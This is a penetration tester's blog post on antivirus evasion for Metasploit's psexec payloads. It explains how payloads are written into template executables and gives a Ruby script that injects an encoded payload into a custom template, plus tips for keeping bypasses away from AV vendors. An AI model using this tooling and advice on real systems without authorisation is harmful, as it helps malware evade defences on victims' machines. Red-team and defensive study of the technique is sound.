When I do a penetration test I typically find some little hole someone forgot to patch, which I then use to get the local admin password. Most companies use the same local admin password on every machine, so my next step is to use the psexec module in Metasploit along with the admin credentials to get Meterpreter sessions on as many machines as possible. The trouble is that the executable the psexec module copies to the victim machine is typically caught by the AV on that machine. Fortunately, Metasploit has built-in tools to help with AV evasion.
Metasploit creates executable files by encoding a payload and then inserting the encoded payload into a template executable. The templates live in the data/templates folder: Metasploit ships templates for Windows, Mac, and Linux, for x86, x86_64, and ARM, and a template for Windows services. The data/templates/src folder holds the source file for each template.
Modifying the Templates
Each source file declares a variable to hold the payload and initialises it to the string “PAYLOAD:”. The payload variable is 4096 bytes in some templates and 8192 bytes in others, and that size is the ceiling on the payload the template can carry. Metasploit's lib/msf/util/exe.rb inserts your payload by locating the “PAYLOAD:” string in the compiled template and writing the encoded payload over it, so you can use a custom template as long as it defines a variable of the right size initialised to “PAYLOAD:”; if the variable is smaller than the payload, the write clobbers whatever the compiler placed after it. The service template additionally defines a variable initialised to “SERVICENAME”, which is replaced with the service name in the same way. The variable definitions in service.c look like this:
#define PAYLOAD_SIZE 8192

/* Both markers are overwritten in the compiled binary by exe.rb; the array sizes bound what fits. */
char cServiceName[] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
Using a Custom Template
If executables built with the default template are caught by your AV, modify the template source, compile it, and use the new executable as your template. The compiled binary must still contain the literal “PAYLOAD:” string (and “SERVICENAME” for the service template) so the marker can be found. With msfencode, pass the template with -x:
msfencode -t exe -x /path/to/template/template.exe
With the psexec module, set the advanced options EXE::Path (the directory holding your template) and EXE::Template (the template file name) instead.
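As an added example (my own code, not Metasploit's lib/msf/util/exe.rb), the Ruby script below does the same marker replacement exe.rb performs and also measures the slot a custom template actually provides, so you can confirm a recompiled template still has a usable “PAYLOAD:” buffer before handing it to msfencode -x or EXE::Template. It assumes the compiler zero-fills the unused part of each marked array, so the run of NUL bytes after a marker is the usable slot; the function names, the 32-byte service-name array and the mock template are inventions for this example.

```ruby
# Added example, not Metasploit's exe.rb: mirror the marker replacement so a
# custom template can be sanity-checked before use.
# Assumptions: the compiler zero-fills the rest of the marked char arrays, so
# the NUL run after a marker is the usable slot; names below are made up.

PAYLOAD_MARKER = "PAYLOAD:".b
SERVICE_MARKER = "SERVICENAME".b

# Locate a marker and measure its slot: marker length plus the zero bytes that
# follow it. In a real PE other zeroed data may follow the array, so treat the
# result as an upper bound, not a guarantee.
def find_slot(template, marker)
  off = template.index(marker)
  raise ArgumentError, "template has no #{marker.inspect} marker" unless off
  room = marker.bytesize
  room += 1 while off + room < template.bytesize && template.getbyte(off + room) == 0
  [off, room]
end

def find_payload_slot(template)
  find_slot(template, PAYLOAD_MARKER)
end

# Write the encoded payload over the "PAYLOAD:" marker, zero-padding the rest
# of the slot (as exe.rb does), and optionally rename the service. Refuses to
# overflow the slot instead of silently clobbering what follows it.
def inject_payload(template, payload, service_name: nil)
  exe = template.b          # binary copy; the caller's template is untouched
  payload = payload.b
  off, room = find_payload_slot(exe)
  if payload.bytesize > room
    raise ArgumentError, "payload is #{payload.bytesize} bytes, slot holds #{room}"
  end
  exe[off, room] = payload.ljust(room, "\0")

  if service_name
    soff, sroom = find_slot(exe, SERVICE_MARKER)
    name = service_name.b
    # Keep one byte for the terminating NUL the C string needs.
    raise ArgumentError, "service name longer than #{sroom - 1} bytes" if name.bytesize >= sroom
    exe[soff, sroom] = name.ljust(sroom, "\0")
  end
  exe
end

# Constructed stand-in for a compiled template: a filler header, a 32-byte
# service-name array and a 4096-byte payload array, laid out as service.c
# would if cServiceName were declared char[32]. Not a valid PE.
def build_mock_template(payload_size: 4096)
  header = "MZ".b + ("\x90".b * 62)
  svc = SERVICE_MARKER.ljust(32, "\0")
  buf = PAYLOAD_MARKER.ljust(payload_size, "\0")
  header + svc + buf + "TRAILER".b
end

# Stand-alone use: ruby inject.rb template.exe payload.bin out.exe
if __FILE__ == $0 && ARGV.size == 3
  template_path, payload_path, out_path = ARGV
  exe = inject_payload(File.binread(template_path), File.binread(payload_path))
  File.binwrite(out_path, exe)
  puts "wrote #{out_path}"
end
```

Run find_payload_slot against your recompiled template first: if it reports a slot smaller than the 4096 or 8192 bytes the original template declared, exe.rb will write past the buffer and the resulting executable will most likely crash rather than run your payload.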
There is no tried-and-true technique for bypassing antivirus. You may find your AV product can be bypassed with simple modifications to the template, or you may find that it doesn’t matter how you modify the template because the AV is matching on the payload itself. That is when your choice of encoder becomes important.
Here are a few things to keep in mind.
- People don’t like to talk about how they bypass AV, because once a technique is public the AV companies develop a signature for it.
- Don’t submit your AV bypass to VirusTotal or similar services; the AV companies use those submissions to develop new signatures.
- Set up a virtual machine with the AV you want to bypass, update it to the latest signatures, then disconnect it from the network so your test samples are never uploaded.
UPDATE: I have rewritten this article and put it on the Metasploit documentation wiki; you can find it here.